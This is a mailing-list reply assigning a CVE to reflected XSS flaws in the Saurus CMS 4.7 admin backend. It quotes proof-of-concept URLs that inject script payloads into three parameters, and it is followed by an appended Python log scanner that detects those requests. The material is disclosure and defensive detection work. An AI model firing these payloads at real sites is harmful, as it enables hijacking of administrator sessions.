Date: Sun, 8 Feb 2015 22:35:52 -0500 (EST)
From: cve-assign@...re.org
To: Steffen Rösemann <steffen.roesemann1986@...il.com>
cc: oss-security@...ts.openwall.com, cve-assign@...re.org
Subject: Re: CVE-Request -- Saurus CMS v.4.7 (Community Edition,
 released: 12.08.2014) -- Multiple reflecting XSS vulnerabilities


> I found multiple reflecting XSS vulnerabilities in the administrative
> backend of the content management system Saurus CMS v. 4.7 (Community
> Edition, released: 12.08.2014).
>
> The parameters used in the following PHP files are prone to reflecting XSS
> attacks (including exploit examples):
>
> user_management.php (vulnerable parameter: "search"):
>
> http://{TARGET}/admin/user_management.php?tmpuser_search=1&tmpgroup_search=1&tmpsearch_subtree=1&search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--&user_search=1&group_search=1&group_search=1&flt_role=&keepThis=true&id=&op=&keel=&group_id=1&view=overview_false&user_id=&user_prev_id=&user_next_id=
>
> profile_data.php (vulnerable parameter: "data_search"):
>
> http://{TARGET}/admin/profile_data.php?data_search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--&profile_search=&profile_id=0
>
> error_log.php (vulnerable parameter: "filter"):
>
> http://{TARGET}/admin/error_log.php?id=&op=&keel=&group_id=1&otsi=1&page=&filter=bla&algus=31.12.2014&lopp=07.01.2015&err_type=&otsi=1&page=&filter=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C!--&algus=31.12.2014&lopp=07.01.2015&err_type=
>
> Vendor patched this vulnerability in the latest commit of Saurus CMS v. 4.7
> (CE, released: 27.01.2015).
>
> Could you please assign a CVE-ID for this?


Use CVE-2015-1562.

---

CVE assignment team, MITRE CVE Numbering Authority M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
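
Added example, not part of the e-mail above and not Saurus CMS code: a log check for the three script/parameter pairs named in the report, which also covers the repeated "filter" key seen in the error_log.php request. It assumes combined-format web server access logs; the function names and the sample log lines are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Script -> parameter pairs named in the report quoted above.
REPORTED = {
    "/admin/user_management.php": "search",
    "/admin/profile_data.php": "data_search",
    "/admin/error_log.php": "filter",
}
# Characters that let a reflected value close an HTML attribute or open a tag.
BREAKOUT = set('"<>')


def suspicious_values(request_target):
    """Return the reported parameter's values that contain markup characters."""
    parts = urlsplit(request_target)
    param = next((p for path, p in REPORTED.items() if parts.path.endswith(path)), None)
    if param is None:
        return []
    # parse_qs URL-decodes and keeps every occurrence of a repeated key, so a
    # harmless first value (filter=bla) cannot hide a later one.
    values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
    return [v for v in values if BREAKOUT & set(v)]


def scan(log_lines):
    """Yield (client, path, value) for combined-log-format lines that match."""
    for line in log_lines:
        try:
            client = line.split()[0]
            _method, target, _proto = line.split('"')[1].split()
        except (IndexError, ValueError):
            continue  # not a request line this parser understands
        for value in suspicious_values(target):
            yield client, urlsplit(target).path, value


# Constructed sample lines (documentation addresses, made-up timestamps and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Jan/2015:10:00:01 +0000] "GET /admin/error_log.php?filter=bla&algus=31.12.2014&filter=%22%3E%3Cb%3E HTTP/1.1" 200 5120',
    '192.0.2.11 - - [07/Jan/2015:10:00:05 +0000] "GET /admin/profile_data.php?data_search=smith&profile_id=0 HTTP/1.1" 200 2048',
    '192.0.2.12 - - [07/Jan/2015:10:00:09 +0000] "GET /admin/user_management.php?search=%22%3E%3Ci%3Ex&group_id=1 HTTP/1.1" 200 4096',
    '192.0.2.13 - - [07/Jan/2015:10:00:12 +0000] "GET /index.php?search=%3Cb%3E HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only GET query strings are inspected; values sent in a POST body do not appear in an access log and need a different data source.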
